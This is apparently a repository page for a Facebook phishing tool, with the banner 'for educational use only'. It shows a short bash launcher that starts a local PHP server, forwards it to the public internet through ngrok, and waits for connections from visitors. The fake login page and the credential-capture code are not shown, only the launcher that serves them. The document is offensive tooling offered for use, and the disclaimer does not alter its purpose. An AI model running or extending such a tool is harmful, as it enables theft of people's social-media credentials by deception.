A Simple Facebook Phishing Page • For educational use only • The author is not responsible for illegal misuse.
at master 20 lines 318 B view raw
1#!/bin/bash 2 3# Load functions and banner 4source utils/banner.sh 5source utils/functions.sh 6 7facephish_banner 8check_installation 9handle_exit 10 11port=$(get_free_port) 12 13# Start local PHP server 14start_php_server "$port" 15 16# Handle ngrok forwarding 17start_ngrok_forward 18 19# Wait and handle incoming connections 20handle_connection